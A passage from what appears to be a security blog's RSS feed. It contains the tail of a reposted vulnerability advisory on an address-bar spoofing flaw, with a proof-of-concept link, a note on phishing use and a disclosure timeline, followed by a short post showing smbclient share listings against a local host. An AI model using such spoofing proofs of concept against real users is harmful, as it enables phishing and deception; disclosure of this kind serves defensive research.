&lt;p&gt;First Click in this link ==&gt; &lt;a href=&quot;:#:&quot; onClick=&quot;invokePoC();&quot;
target=&quot;_blank&quot;&gt;invoke PoC&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;and Look in result window, the address bar , don't show The url
and if you write any url in the address bar, the browser do not navigate to it.
This issue can be used to spoof sites or pishing attacks.
Safari 5.1 (7534.50)
&lt;/body&gt;
&lt;/html&gt;&lt;/code&gt;

################
Solution
###############

No solution at this time !!!

###############
Timeline
###############

Discovered :Mar 30, 2011
Vendor Notify: Sep 28, 2011
Vendor response: XXXXX
Vendor Patch: XXXXXX
Public Disclosure: Oct 03, 2011

########################## €nd ########################

Atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</pre>


<p>No related posts.</p>]]></content:encoded>
			<wfw:commentRss>http://cq-cser.cn/2011/10/qtweb3-7-2/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>samba4_smbclient_linux_winnt_share_file</title>
		<link>http://cq-cser.cn/2011/09/samba4_smbclient_linux_winnt_share_file/</link>
		<comments>http://cq-cser.cn/2011/09/samba4_smbclient_linux_winnt_share_file/#comments</comments>
		<pubDate>Thu, 22 Sep 2011 12:33:34 +0000</pubDate>
		<dc:creator>cq</dc:creator>
				<category><![CDATA[linux/unix]]></category>

		<guid isPermaLink="false">http://cq-cser.cn/?p=1491</guid>
		<description><![CDATA[apt-get install samba4 http://wiki.samba.org/index.php/Samba4 http://wiki.samba.org/index.php/Samba4/HOWTO 例: root@bt:~# smbclient -L 192.168.1.3 Enter root&#8217;s password: Domain=[1UEUKFM1YARQQWT] OS=[Windows 7 Professional 7600] Server=[Windows 7 Professional 6.1] Sharename Type Comment &#8212;&#8212;&#8212; &#8212;- &#8212;&#8212;- Error returning browse list: NT_STATUS_NOT_SUPPORTED session request to 192.168.1.3 failed (Called name not present) session request to 192 failed (Called name not present) session request to *SMBSERVER [...]


Related posts:<ol><li><a href='http://cq-cser.cn/2009/12/asp-net%e7%9a%84%e5%87%a0%e7%a7%8d%e9%a1%b5%e9%9d%a2%e4%bc%a0%e5%80%bc%e6%96%b9%e6%b3%95/' rel='bookmark' title='Permanent Link: asp.net的几种页面传值方法'>asp.net的几种页面传值方法</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p><span id="more-1491"></span>apt-get install samba4 </p>
<p>http://wiki.samba.org/index.php/Samba4</p>
<p>http://wiki.samba.org/index.php/Samba4/HOWTO</p>
<p>例:<br />
root@bt:~# smbclient -L 192.168.1.3<br />
Enter root&#8217;s password:<br />
Domain=[1UEUKFM1YARQQWT] OS=[Windows 7 Professional 7600] Server=[Windows 7 Professional 6.1]</p>
<p>	Sharename       Type      Comment<br />
	&#8212;&#8212;&#8212;       &#8212;-      &#8212;&#8212;-<br />
Error returning browse list: NT_STATUS_NOT_SUPPORTED<br />
session request to 192.168.1.3 failed (Called name not present)<br />
session request to 192 failed (Called name not present)<br />
session request to *SMBSERVER failed (Called name not present)<br />
NetBIOS over TCP disabled &#8212; no workgroup available</p>
<p>root@bt:~# smbclient -L localhost -U%<br />
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 4.0.0alpha9-GIT-9733816]</p>
<p>	Sharename       Type      Comment<br />
	&#8212;&#8212;&#8212;       &#8212;-      &#8212;&#8212;-<br />
	printers        Printer   All Printers<br />
	print$          Disk      Printer Drivers<br />
	test            Disk      Samba server&#8217;s CD-ROM<br />
	IPC$            IPC       IPC Service (%h server (Samba, Ubuntu))<br />
	ADMIN$          Disk      DISK Service (%h server (Samba, Ubuntu))<br />
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 4.0.0alpha9-GIT-9733816]</p>
<p>	Server               Comment<br />
	&#8212;&#8212;&#8212;            &#8212;&#8212;-</p>
<p>	Workgroup            Master<br />
	&#8212;&#8212;&#8212;            &#8212;&#8212;-</p>


<p>Related posts:<ol><li><a href='http://cq-cser.cn/2009/12/asp-net%e7%9a%84%e5%87%a0%e7%a7%8d%e9%a1%b5%e9%9d%a2%e4%bc%a0%e5%80%bc%e6%96%b9%e6%b3%95/' rel='bookmark' title='Permanent Link: asp.net的几种页面传值方法'>asp.net的几种页面传值方法</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://cq-cser.cn/2011/09/samba4_smbclient_linux_winnt_share_file/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>

